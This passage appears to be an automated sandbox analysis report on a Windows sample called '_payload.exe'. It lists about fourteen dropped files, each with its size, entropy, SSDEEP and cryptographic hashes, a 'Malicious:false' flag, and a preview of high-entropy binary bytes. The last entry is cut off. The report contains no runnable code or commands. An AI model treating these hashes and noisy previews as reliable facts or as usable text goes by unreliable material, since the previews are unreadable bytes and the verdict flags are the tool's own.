                                                                                                Preview:.<?...(.........Q..a]<:5...@.2z.....h.]...l-.9.J...;|....\n....o>$...o..O...w/..!N....L..c...D.....&.\.....C.8....G9....<.x.s.!.fi.(...F..p.....30M...]8$1.0.._wD.+ucJ..;..3"A.^M.hL.}...9.IZ...<%X.w.A3.:).zv..2..=i.%).)"^.....S./9..3...=....0;...r.!.vA5.2..A....c..{...c..:ZP.V...q........<."......r<..........*%..8&...k...+...O...u+...9A|."..7..DW.....#...i.....n:.)S,e...m.W6,t4K2....=.}.U.J......|Do U.4d.....g.)2.&!_<...i.-lf..Hr<.._...X..9H`....x..|.ow.N..C.Z.&XR.*...M......o..ea#`O....r..6....9...3...L.`..#.....OMD._...:.n..f....0P.6R..\.......;d....}..9.n.]......J8..~[..ao.!.J.9..y..Up.T}...U..(.t..k..,....?.......l...OR.....2....mAy.4..tE9"..X...!.]H..Io2.G...g'.JhnQn=.0..*,3..W.v....>].s.!..1.4..<...ZK.?..<.k....9..,.~......P).w...|..k....i........y..zid jM...@..m.]h...P=.UX= .....".F2{:y;#S$..(..B/...n...&.w.....7@R.......<.[Q.!..........o..v........g.......B\.....A!.c[.....]...D;t...)L.a....Vb...UJ+....s(.7z....WU...p.>:]g
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1733
                                                                                                Entropy (8bit):7.89482602940785
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:p8p+7tC0YSHy+cU6xhNSLpaxwVpv14h3pcRLD:pocsrSSoqjSLmivep4
                                                                                                MD5:22042828C2D9830E0EE8363496F9F800
                                                                                                SHA1:816DC4F38E462070C97073BB740D7CCBDBBD4A04
                                                                                                SHA-256:E1FBC645AC8853C28C2777DF60136E2CE7354047BE84F69191D5F378D5F4A688
                                                                                                SHA-512:F87B683EE312A9FCA24F0FF5006155FFBA18174654CEA663479E80423D2FF7B9F20B170144881C6F06B5D4D93FD354D3C82CE50A72222978B745C64D8A75A223
                                                                                                Malicious:false
                                                                                                Preview:.<?.. $S..".z.1.vLvb..2a...3.4._...K.a+w....;>6O<...\.$9.V.w....a......FJ.4.W.y....}7AC.\g!k...%...^NO..B...=r..e..STx...?7}+ B2....h/.......tl.'.<Ed......l\...k.........$l.f1W`7.X......;.7E......<.FM....uF......F\.B.,G...m^...Y....Zf.....g..J.:F.Gi..t...&Z.R..C.......j..uDZ....f..X4.>Pq...<..T...[@..J.v.}...c.....N..|...$..Y}...{.!&.L.r..o..#?.7....%n.kG.y.`.z?...}..1@..$....O...W.........8.. ....Sx..... ...D@..5]3ix..O.....A.........qs....\5. .<.}...:...k.4..W....y...GJ..L..>O.... xiQ].qC.3c.Q.$.p..l.%/.<..B^..`.t0...-!g..f.%l2.i.#...O.."`e......:.m.v.@.XT.^.&....?q,...e.D.;..-b..Fz.u......=x..j...~.c.+.^..E]Gv./.c..@..G{(..<}m...y.x.p?{.K(.i.d.mV}..._.Bli...xid!.,..L.?...+.....*........3......r.OV@..f...._4....S.$)n.vj._...0m...:6.U..}v.i..9o.V.....k9;...*..:.."I..WU.........FRB..N..wv....$8mx.g.....p...GUD..Zm....O`."...#.&.n..`..Q.......S.54.......t..|.....-:..S(.W....0.....F..a(..q&..U...]...Z..K..k. B...V7+....E.....l.,_.=.Y...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1694
                                                                                                Entropy (8bit):7.872653662649328
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ksK9noiG1tSC1L/uI7LjP/8ORfeiD1ec6I5je4ec5XdWg0sLD:ksK921Q+Ll3jP/8qfei5ec6I9e4ec5N5
                                                                                                MD5:BD80C0AFC3410A8ADA323F4743C3FB36
                                                                                                SHA1:7F76556309A6F928E7A3C843765A127856B8B9D4
                                                                                                SHA-256:48912E77D4C598F8B81FD341FDB6EB50DD98E603EADC0A3C6AA0F1E56082D413
                                                                                                SHA-512:57876B2A15CAE45BDCF64EA1801F9DDAFB0B0F113DAC42935CB3EEB77D8913960D833F85D857EDAD812A32D88C30BE735C89E5860434C7F0E33C379FA1E6E440
                                                                                                Malicious:false
                                                                                                Preview:.<?...A..d*......a@.c.4.x.....sS'....Q...YHr..r.hx.%*...?T.......C..n.$....*i..-...0m)....w.....f.s.v..v..m #.[..T.....(.^.....|..'nL.h.j)......gx07.......m.....h.....xN)...M.J..g...}E..,.1r.(..;...6^.}..-P.A.....[..LH.b..-./`....R.Dn.*.o......8..X.........a...RM.<..6.S4....OF.zW.-.f...D.......*6N.....:m.Z%......b.aq*....K.$'......5.".....BE.8..N...~,..s....v.P(.S.CO.b6-xW...vZ.@..HMa..7..........D../i....b.....1........'-.....p.[5.}.T...[..lc/..b.O....G_h*;P.c..W.@....EN,...4...Z........b#.PB.S..|B.%.}j.#..w..g..+.+.7....2.....V.Z5 ...@....r.Pu,!.m..T.6..7.....x.....9..X`..........:..l..i./......,.......8.KPtYui....kS.....D.I.a.......]...'W.!...|......85.]....@.j .E...e..Ls|...R9..ri..@.A"....v.}.#...&V;..q....%+K..I. ...G.......u..c.Bm......>(.b...~GeS..e...AT/. .9..$...?<......dwr...N..[....&.N....)...8@......$s..r..P.P..P.b....E..pl;.'.M..`..O..5?].V....M.c..s...5H....\T.`.1<..t,.]^.m..US.2v....h..D..XM..V.yZ.|..wO5..........od
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1731
                                                                                                Entropy (8bit):7.88773319787309
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:124bVkYfNGkkNl6AAUM8sl4a5MhlnQ6Tyv91LD:124VBNwzTAUMfNAHTyv9B
                                                                                                MD5:314035584005B12B9E83237054482575
                                                                                                SHA1:4E610CD8BAE29F72A683F8B4C3C7810E184010A1
                                                                                                SHA-256:A0CE9D673AC7D8AAEB581C316BC00E32409D80FF9FBD29A8412B1F2C5BC75642
                                                                                                SHA-512:F3D83561A33B3C857B7034C2A6B07429054CC9EB0192553B3E936B314CE93498A573F33903C3CBFEB96E04A8A751D098ECD6DE97D063D2D3BCE67C2D16B57CEA
                                                                                                Malicious:false
                                                                                                Preview:.<?..+...HF..^@...0q..^....,..5J<.x../!...[Oy.....0.b...JC...............)$Uz.~..82.f...s..'.....Y.:.W(".RC.8..}.}.%.....h1&.B..h............9....u....1.lE.W....4...mJ^.O8.q....w}9!9..S9'J........b...gL.y.....UC....q..i]...'..B.5v..o.]..a....g....Mg.f.b.......p...s.$+../..Wl..$4s.y......m.6......LQ.?zg..}.w...6.bJ~....0"jD........2d...../.DG..^.2..T'`Qda.Il....."...BD.a..m+cj..O>r..p...Td`.P0.F@.....p.>xiq..B..<..7*.E@....#uV..7.......2L.o..#D8w.m..Iq+.|........]..e....T.......}.h.v..cn-.8J.c..|3x....^o....|n.M.4.....v.Nvw:....^D..m./..q..$..-..U..KkWD...b.LL..})N..r....$@.x..P>..:h-.o... ......i..m...6A....v.j.....u$.?g7.^......}.&.:..'.I......G.j@v...R8.(..8.T(As...w$.>.;..Or.J.d*!.........V.t...L..V.`.$.C)...z...(Z.......f....P........}.I'N.....hJ.xD...f....V.p.:..4l..P7..r...>....[{.............R....>.$.gy.P"...d........Vy.5.O@03.L..6p.Ll.s..i..W.c.a.^P....`e...|J.{.U.+|..$....1..(C.E. [U.TB......>wby.br.....*SN.v. 8 .u....!?.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1716
                                                                                                Entropy (8bit):7.881871614083134
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:RcS0CkqGnDf4weGWnRg7UA7eTcLY884iI+EwoyZCMU3E0UP1vC9L6Ps3uWHQClGE:RcSj6TWnRgF6cL/yEwlTYAvCowfDlNLD
                                                                                                MD5:882288CB19EFEA2105AE1EFD060B95C0
                                                                                                SHA1:F0D7F48724B8C830D958D6ECE8A511FD1FAFD397
                                                                                                SHA-256:93B074C66972598D0C018488C714C11FB46758AFC8B948426E47174E1A49524C
                                                                                                SHA-512:FB1DCADB18C6145E3FA89874A368ABDEF582D37CB05318A158353CC21131287F0D20424CC3AEC0437A90F10C225AB4AE9162A20DFD4BED3C028262FC94B97909
                                                                                                Malicious:false
                                                                                                Preview:.<?Y.g...A~..].+...,..3.kw.I.Rjc...T.~...&Xz...6....i).Q........ .A.M..RN.....tG.....q@\..]b40...-..7.}C....CqjUC....i."=T.s..?M..".w.?.1.%gq.....@...h(...Di.6..'...\...T.$.Ny..C.t.>.....w.....O.=.l...?.._.........o.j8.Ve..$..f..*ZJgfL0(.7..(....^..2...X...d...B.=.~.`./..n...)..~y...G......u.....:...4...b.(.....e.,J3u....:...j.y...ur......e.N.~M%.gx.......if.GE?....q.d..d..+...BR..Muo^.....-y#%.^..s...Si.....m-.*n^ ..........4.....C%.....I.gP/..3..^....O.....b.../..&].C......Z.5.p.....zn'...K.x<".V..Sj.$6..d..j.....a.(...0c.:...:....L.N..*(.._.....a5y*.-t.H_y.....L-;.N...R...y..k!=.m.."h.D=N./.I....3.yIH(.....8.U..:....0........~&1..K.|7!...\}.Q..I......y.%P:..t...../.&...=FR.G.....h+.o.A..g..........MS~..GV.7......[.x..".I/ ............x.muob.....f...W.....F..}.....C.........p.@..C..GY>...<...X7.[.H....t.:G..|.=%Gf.4.1.y1D:...U...H\Z.i.+o>..v^;..0.or'....w.[$]E<. '`.Z..[..2.....lVE...7OXT.u...q......T.k9..-.....M....;. .&.V..C.' .x...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1753
                                                                                                Entropy (8bit):7.89870376620963
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Q5mlCmOnYmxwn4JIBBAmrFreeGXtsflWL4Ig2DSNLD:UmlH5B/FjKPDSZ
                                                                                                MD5:7A7A22A7E838C5DDF0CF3FB0A9703460
                                                                                                SHA1:DE21D0A382AC4B3951943B8372A1CA1BE67C5106
                                                                                                SHA-256:0B14D55AE35E9F9473A1508A4E17BDE1F74D19E6695BA52D2CB77C0F41CB7BBC
                                                                                                SHA-512:D15052CD55671A37A4B76F9709FFF307C2584E4F6AF31E3C249AED259C4B68BD9EB5BF3A86CE763A1E6B080C25118EBA4C4DDE636F53B2313762076C2AE10346
                                                                                                Malicious:false
                                                                                                Preview:.<?).".T~....s.g.Zx...P..9....-..+[....2......D..{..t....g.r..9...:-.r.T._lrYT.$5.N.[.......B.},.....{.....d+.;Z.<0....z...}..|..I....r..-..."..1.Pm..w.M?...!AsW9l..x...vf.,.8[.x#?...e.p.?..1y.Z.t.I.A.\........]...5$9.zG.2..o...6..Q....-d|kY...<...~..d.....{.Z..X[@.....z.. ).S....DL....(Q*...`c.F..ZV....n.w4.'...ko.".kW..J..:....sY.....A.T.Y.....sB..$q....&.....9.+H,..w...t.....\.u[.|......%F.{e..x..(....F...lo{E...)^8}...0[z..z..f{6..^.......;...+'7.*.w.Q..X.L...q.p.5..%.2..BJ.........%...a.....jM.......TQ...K.../.........e....ix.Wf%JQ.H....{]f..\.2.7<..Z.R..a...7.m.AL.i../!w.TH.$.T.~...X{.B....\...yz...N..."..T..U.{.U......YG....".K...*...uM.2M....kz..6.{...4...g..!+...`......Ml....+...H.I.5..j......5W<..Dd.......)X..)...X....3.`..\.w."&........._,.........gef8....gY..(C..g..-z.:.w.g..8f...e.........]...2..i+.(...$...u.J)i.pQ.<,l..*ZF...R../.g4...-.C7-...9n...S_.....+}..Q.{..S.x..t.-.c.z~.....]U.H.\X.4..|...H..........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1700
                                                                                                Entropy (8bit):7.893106693470187
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:00MRjY4VXDwlqYP/nvfHITnPnNKGMJYLD:PMRjY4OzPfvfHE
                                                                                                MD5:378589D0BE273DF8D8D2DA1E68EF9090
                                                                                                SHA1:F03BCC1D9CDFDB25EC9C0CC800842289B6E0E4BF
                                                                                                SHA-256:DCC6B4C8F4261F52405A47864B66E1A5AE2D783D0CBA5ED475511F811F6E86DC
                                                                                                SHA-512:A7DA030109C4C8CADA2DB44497A54514B26E472A9AABBAA8CC8378D75C541BDE9C0E2590BEADE02C4CCB0D0399AACE30C6EB24FBA37AF00659E7EE6DD8A50E3D
                                                                                                Malicious:false
                                                                                                Preview:.<?.. ....D..)..jDX......Ex.R....-.........~.=.)}J....I...._.....J......f.h0....qY.52.c3....U.H.".t...t_.Y..DK}..51i...........s..rm.<`....je.+...m.?.-W.:..+R.V0...~:$.y.......y...6.A....G..D@ P...}2,.;U......7..I.B.n..D.....Vo..........H..>.~.eN..^..#.....?....W.z..|.&....x.b>.}.1..~..l.y{..8..s}`t.W.:dX..l....._...!..9.n...[-...?r]...7lM.,..M.s.^J...P..sgl..'....Nq.....H..7.T..5....&:.dmW.K........|..`.m\?.#|..vX.k.|.Z.....(.....6..7.z......$....:w....>.s...!xt`..6.[.SP..6=.g..l....%~..lKs.......@......U..Syl...!...p...8...M.IX..S.b.bR...UXu36(.]...r.2.n.f(..[....)..).o..k...t.Vf(..4...i:).........\..nm..r..>..'K.....,.q.......5.........k...8...@.'\0.T..>.l#.|...E....$..|...V.]u..>...F.%.....tV.z..Y.h..1.......Fg....|+.'..6.i.G5..P<.........=....x...v...]......J).........FJ..%......>h=:..G.....K.og...U.Lx.1Jk..Uj..0.O2~....j&.9Q.e..p.z...H.....1.:%.X...4...#D.........*'.f._"..#gHiF...R..I*KT.5.d4.P0... ..'=...n......*.J....<.?
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1737
                                                                                                Entropy (8bit):7.883629483900412
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:vz6kNJfTYYi+iTO8KOEsmsNeZey9WELV8NNlzsYLD:vDNJ5itnKdrsMo+WEWzH
                                                                                                MD5:74C0AECCD1158292410AF4D2C3DECD17
                                                                                                SHA1:BC237BD6FF18DAEFE1065754FFFB245997D9D93A
                                                                                                SHA-256:7B89FA4EFF7F2AA46BA763CE299F1DB128FF9ECCC087F4C6575F22533D42F789
                                                                                                SHA-512:960E074D3836BD2F0DB8A8D3AB5D4E261F3AC6E05A9C44F0A40041E862EFF3FB9D7AEB0D1E129C75441070A59E64CB4BAB507426DB3D1995B0DFD7B3C2F4A568
                                                                                                Malicious:false
                                                                                                Preview:.<?.....={.Nu....h8.K...q..!...4:.[.v.-O~.S..W...w...d.......&.-..8.?%....J..O.O3+.s..u5k.|z....j........2....t...._. ... .v%..i+..+:...4Li oy.y........8.g..KBL.K;....{R..#...."......h..5.<,U...j./.....Y.....3g(...V.8P..z.A.6.b...h1..S`....5..j.../c..3q.I.G.u..[q.|*'...2#..[7.I....Z../="....E.q.....>.+..~^*g.i.^z...e.4.f.[.*..w..][9~"....F..F..=..d..a....m.......r{F.).r......]....+b2......nu.y...$./..k..\1-....3.EG..\lR[...|$.s.o*.....'....O.~.E..$8..W..,..U.#.$..D........FO...#.g...V..U..uz...3.cF....2xb@.:%)..H..+.U.....|Lk..g(...|.q...76...../.[..v.]...xny.....w.kq..|...}.r.>.I......"...#.W.q.%K..u...R#...|.....{..#.p..7._.H02O.k.'..G.C.U.Us.34?G.V..@..&w..6.O.....BG/.._H.)Xf!@...v....!.E... ..]..u...^..8 .o.J[+...<..^...b..q..kE..CQ..S...G+......'.v.:w...~.9Q .v..3.A.T.{z....`.h..K...l.....).....O.=M.\D..;D.*yWM.6@.1P....e.....(.'.@.Z...../...!.6b.......8ki...!.t%Q....d[v_..PQ.1BFq! ...07..E[iE..u..0]...>.WX.Z|4j#..PR..".
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1722
                                                                                                Entropy (8bit):7.892898778351313
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:N9rAN/bNMpPHAokJnF0JvNpzoe2o+a/+tQtg5thKoqKULD:NBi/ZgOGN5v2Ja/+tH0Lp
                                                                                                MD5:9B60C602358B18DD0636D6792797A306
                                                                                                SHA1:8D1087223F1424A439122B87F6AD4E46933EA331
                                                                                                SHA-256:D8617B3B45E0BD2D2545D284138817D5DDEA49A1B5BBCDBA3A6D1C195207F6E8
                                                                                                SHA-512:F6F41F204F1B78A03EDB93C74C78B2A062E4D6B5CDE9703C2245FE4B3D3B956E84D5BDFB0F298276B89B32C0D4062CF1AC19C2C25B29C58412DA7C0B5737FF37
                                                                                                Malicious:false
                                                                                                Preview:.<?%.M."...#..NQ`@.H.H.0+...mk.c.,..&......T..IBo'.v.:j....p.d.!..#.F..../?..I..+.6.../.a.(....c...kYL._.K.YJ.....#%.....yp....O....).....D........*.".].h.vk_...$gq.A?4....u,7/....... N.)....M./..."....S...+.\8rh...5D.m.!.U.3..w..e....y.D.k.M.@...P.....cXS.......J.Lc..z......R-.2.M..pD.Q..t.A../-`!..@...[.5M..'....c..X.G.a@...y...z..6..n&.{.d.9"..!..._s....T.&..j.=.5.?};(.K..$2...........9+..ieKbA..R@d.X..='.t.>X.QQ.d3 ..o....V..D......N.!i.......i.a.>"...G.........K.`.ks...@.{......9.....7[6/......B....j..4..4.`Uo...5@.........B=.ZGbQ[\.O.+"_4..7.P.;...a..qi.<&.O.f.:.......}..1'zg...Gn.'..3.)..JQ.'pX...y..yF..82@.{...m...W...}.BE3.%..&......7.C....!....m".C.CB.<*..c..`..".........]p.A.. ..}..3..P......._.....g.....G....{%).-$.J...f^c_L.{.........".y....-W...q.....4Mj......`....m7....;B.....:B.f^....M*.f..I7.....D.]K..............w.....Wm.Eu..&.XN.g.C.|..>._r'...]..S.~..b.+V9.q.bm...y~..r .'.X...j./....T=.._.V....m.@.k|.Lf.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1759
                                                                                                Entropy (8bit):7.870616054415138
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:e+dTVf/5tA4W5zSwC1+zSlHX/6uvMDqYWDmLD:rVVf8HhSuzG3/3vF5Du
                                                                                                MD5:454477E2F1128678002F275A72AE6F8B
                                                                                                SHA1:1A2A5D4DFEB4B9B30B8DBE571C4B4A3F92C86218
                                                                                                SHA-256:682D33B66F56E7348754770BB56A3831FB05E35C5187FE252F3843220EC566A6
                                                                                                SHA-512:14B2A7A0A16BFCD82E6094A2E71A6A2B04B238E5C60AF2AF1F15F46239FA4DCE516ABE9F9C42B8D3094D36DBDCDD845630F5678834577576F67108628B756858
                                                                                                Malicious:false
                                                                                                Preview:.<?50{.I.....:......`-i....dn..UPA....MK.O.v...7......z'.F..~.....l..6..R...t.h-.0...KSE\...7..K........=t..$....5z0.GR.._..F(*9..*J'<.K.%.\...........d.^-.Mcl@.F..........4...4..=.....y.#.....3m3.>.i.Hu...9.......JNN..H....Q............m.j.........lO%5..mK.t.j.........)k.3....&.X.j..(_.p..........]......YT.q.4..c....N.w.4.K....0|.?....1.R$..t.W..?.ld..U3/.l.i..%.1.Q0......a.a6.....jP}.#..;....R.'.S..A.n0..;.-V/...:..."..Np..w.p.#z..}[.+..DZ..FE'.n'.r.......J...B..5.G5..6...Y.8......@ 1E.O.k..}68<.?..i5..2^..0....Kao..lA..J...M<i.E./...(\..'.q.y.(...G[...7.g...&....dF..)i_.m. .D..l.o2.....k.........8....2g.m..x..n....o.u';.e......@..fA.+.sxY .g....z.....C...B0v..........;R.F.*......'...C...?...w..D.... .F/..?Z2....e....Rv.cJ..M.......<..!..?O]K............6.P.;2].......K.$...I%]F..~.b.Y.p...I.gUXb.#...@A.....M_..,h{.kOm.Q..%X..|o..,.r...... B7R|.hc!..a...&@.z...|.Y.../4O.:.2k...;(}..H..<.N...^..Y%...Y.]`.!.~1..|.$.i.....^.R] ...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1706
                                                                                                Entropy (8bit):7.85348544391618
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:idxc1hj7ocdX1kG2O6IANNxYjAKKmjvULD:i34XFV2Oi/xpNmw
                                                                                                MD5:5BD387DA95C548CE0698F7680A476EA3
                                                                                                SHA1:6AD8E674A71D1ACFEDB692D7405F2AF1EE049C43
                                                                                                SHA-256:38966D2B3DFECC7BAF83C23E95B307BDBA999A87AE316205694BBF052F2AA7ED
                                                                                                SHA-512:3BC3140870991513B33366864CE04D4B330795B4F7539FD645320E47547C136E3E66945F02DA4215B9D8DB69328F24AF4DD1E9A9A62378BBD6B0BF3F98A778FF
                                                                                                Malicious:false
                                                                                                Preview:.<?.l..r.\UAX...k.......y.s.w..........x.,.jb...21K....*..*.,Fo&.w.S.....M...y...*o...X.T...>._....9.r4G.p_.M...B.0c.p..LG_..Q..D.ID:..TQT>.....U.~.Y.. /l.9..?.JC........,..~7..]r........'....5...3.|m...i#. ...;....1A+b..Kn....>}..I8.Y.*..;........K..\g]...[.:.6]x.....OmO...7.y.-. Jib...Y.E.lT....r.]..\<.L.?...a.w.I.I...M.....+........Z.T...ye... .O..PC._....:gaR.<.z\.Q...&....&..#...........S......+.y.+.8M.!.../kW_O.^.........r...Xp.. )cT......`XZ.9.....B^.s/.6.._...Y{.|G.......Q.~...q.n.q.Yz.jY..S..E...`.y.A.&.v ..$.,....>..Y_U..S?y:7.Y....g.}...|rZ...k....pI..A...DK^.......N:.e..5..Bp6.y....._lr.c.CS......g{..O..n..*)....y.Mh._x....V....`..:...$.}.P...0...._..R.V..h......7)h.f6.u1..`L.x`.../0..L]....9r.......M..>YXY.$..l&..F...o....P8...D.....3..Y.O.:..6.d....{. .....O..U..?..g.s.<e.....1........g...Q.~.?.{R2h..X...."]T....].Jd.......;.3...O.A....~..g.,2.T)._*........4..~.S..BPlP...f..H.Ky7...=..\.Se.T,n..F.T\..h;..bD.P........[3
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1743
                                                                                                Entropy (8bit):7.888414630534358
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:My3XD/fj7p4f13vM9UK90Iv8VwKFIXAPspHj2S0lHtK0QgG/7ZvBXWDPs9nQNY5w:xHD5ERvMb908XAPWytlNK0t8Vdr2LD
                                                                                                MD5:FFD758404A335424D3BBD059FB2D06A3
                                                                                                SHA1:25359E8670A38B2552E61C32BA748C8473659BBA
                                                                                                SHA-256:090697442FECD19CE33E762F6E4A6A89EDFE6B2E07EC98A7C0BA0639631DED37
                                                                                                SHA-512:05AC2FBA0DDEED60D94C76608D09AA65ADBECD52103EF06E9F2BB34AE618F42B84B2D6F515E15C12CEA2C51ABC8F9B83B516E93CDC13CD90194A3A1662FA624A
                                                                                                Malicious:false
                                                                                                Preview:.<?!....D....dD..E..7.C._.~...j.z.%...n.;.....:7g...7.....4.v.h@f.O.mn..$...-.S..%(\......'.tu`...,).;...,.....3e?Y.J....0y...4.[.m.<.a2.|t...c.7..t...].O6...g?..42G\.......*.m.H.1.vc......0*5.I.l.N.r.h....tSC....\.\ZI...TR..0.m..J.../..,...H{..X3.;.v1=.Z.3.S.mt.An....C.F....ge........K..N)..........l({..~....W.]h.._P..<k@=@S...X.."<e..D%t..ta..3....lfx.m..|.k2.......38.....r...BkN>...yF.k..JeX.a......D.A..........3.&B....J......S..q...=..d.....X@0..:..Y....i.R_5.+.HC..y..n)@.|QJ..+...,......~._..] m.(.6#...V...:...8_?_..}.r.?A)..).......|....Z..n..$.............\yJ..|I...MM..u.B .AU3.<..f..M.X..wMu..T.....l..j>.{..2Yt....H(*.i'9........J....f....j.}.Z..+-6..Ssa.;..r!!.3.j^fXK...\.o.<(2...i`..gccEn:.[.n.5.s.]3(5..f..i.Gv...-.J..._...M].......9,......d......X.b...7...,-8."....G!Zkp,*...6.,.#69..@..Y5.........@..Mm4..3...9.....FK._..WG4....S..F~.0..(..]...o..........C<1.[yR.g..W....:..z.^..2[...=Z;.F..<.U..`....UK...b7l.M..G.H.WZJ.(V..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1696
                                                                                                Entropy (8bit):7.883561180718131
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:SdZEcuQ93VTtyMgOqw0QqBUboyBurvfsZK0N/MLD:SP5VT8MgO90Q5JBudf
                                                                                                MD5:292963DBFDF73B30A75B8B18915817EB
                                                                                                SHA1:5E5230CB126213924F725C5CA9CB50765A448110
                                                                                                SHA-256:B92472E3453634167CB5C4AAD82EDABCAE59E17A252BC578E027990FC7307FD2
                                                                                                SHA-512:C58159A2D4410B6BA6DEF7BC3FD95DDA2DFECE85315DF8CD4B913DE9B1310182165807E5410911155B41302FFB9471FB07AF0EDACF82FD565D0E8C08F8B4EA02
                                                                                                Malicious:false
                                                                                                Preview:.<?p...Y.2...0[l.."N.>n... .#.4...'...Q0....K.b.+n..q....<vcs.A.c".&....V>....2..M.dXvc..?J......a.=.y.t...h.{....Li..g..y={P..+.......T.zD\./)...U......w.1BM.....u..h8.5L3...?s.in..T.pH>ac....._H.|`..}........l=1.....(.....R.~.x..!.....%.,<./.|.+..x(...0.....m.H...LCn......!.v1.?..S,3*U..-..+.J......hK.;..t,@.%.P..n.>....[.d`.wrF.1s...Z..........2.O...x.|..X%..h.5..f$.....O.c!..cf.#.,....\t..V.K.d....[..b....k.1Sw5.y.L........k.Xs.f..d..P=..S...z..G....~7.^....W....MpVOU.!r.~n.......8Mgt.....\....q^..m"/8...PG...W..!oi..t..K$..i...V..4....I]......~....fy...q.u..w,..8.......Jm..i..5^. #@c..{q..E2........5u.....[.t..css....D........CH.... $.9'.d..B/k>.hCZELW...9.}J./...*.,.......Lz......B...1.TUl...K_& ...z.Up..:ze_n.A...7{.OA.G.D .p.$...g.%".*...l...zs.".. .G..A.]...D...Q...A....,@.....v..._.........T_...s.s..M.`5.C..hR.u.KwC.V.........;.f..]#{..F.....+.x..%"..+./..u.;4t.HM..._..t......Z....S.!.$Z=..Q..g.2.........Q.d.?J../y...M.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1733
                                                                                                Entropy (8bit):7.872605333254473
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Ji6mA7HPi2eiRDyPpMrt6rWPTB8AsenabHPLD:w6mAz50PmtiWtyU+v
                                                                                                MD5:BC34A50CC24BFE91B1E88731DE1930E4
                                                                                                SHA1:474B0A3C7721CC25EC8BA82FEB829B36A7F58B1B
                                                                                                SHA-256:B279ED173A0EE181866A8BE60A6FE102FA5B0F792A218FC341DA8D2924941954
                                                                                                SHA-512:90D8BE9B449C5F62B7EC12A847F48F0F9E3B9FC35EC46493ACCD04B336B3CAC9615555A85883E4576949FC57DBA2CBD613030340B744822AECE389DA5B5216D6
                                                                                                Malicious:false
                                                                                                Preview:.<? .YJ..%,..7j...y@..6t.@...Z.y._n.O..._.....`.YYS.AJ...y......$/a.....^..K..L..G.....9D..@.nS..........I......A.R.....[C......B{n.e..w.z....$...).`.2K.......v..J....=..-.e.......?....i.>...]...q.5`...5...P.e.xF.B.."..g.h.....-.. ..l.2}...../j.p......va0C.........~.[.>...n B{?....k.^.K<.Dy.^..2.=.?..`Y...l...U4a......../.zs..}.e..s..w.+...uL...t.J.-.....' ..)..J(8......q..+.P;1[.0f.D,....a^.<G.....U.....g{...B9Z.h.........A.n".k..F..a0R2..=xg.{^1<.;..m.:.Z.,..h...}W.$6.....A+......'.X.6.........&.*........c..v.X..:..W..,38.4.O...c..A..(....u...)v...%np{=R....p.65{~.. ..O..eR.....!..G}..3.x.0.DDA..1cW...H.F..h&./4Ojr...;.....01.....[j....".....}..>f{...O.......?e.....*.#Md..R...D..(.*..fV...m..&.6n6:..X.3e.\...K.+K.0.e.+..O..K...=..C.....9V..../..44....v..Ua.g..H{.H....^oH..I.:..RDQ>.....m?r}..Z.7.A....V.....%...}x.mDSj~.+.y....n=...NE........-.x....s.e.V'..c...Q.......4.U..}0...0......e.k._S.E.....ogMD.c..X..e._X.~+.....d..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1706
                                                                                                Entropy (8bit):7.878970800458058
                                                                                                Encrypted:false
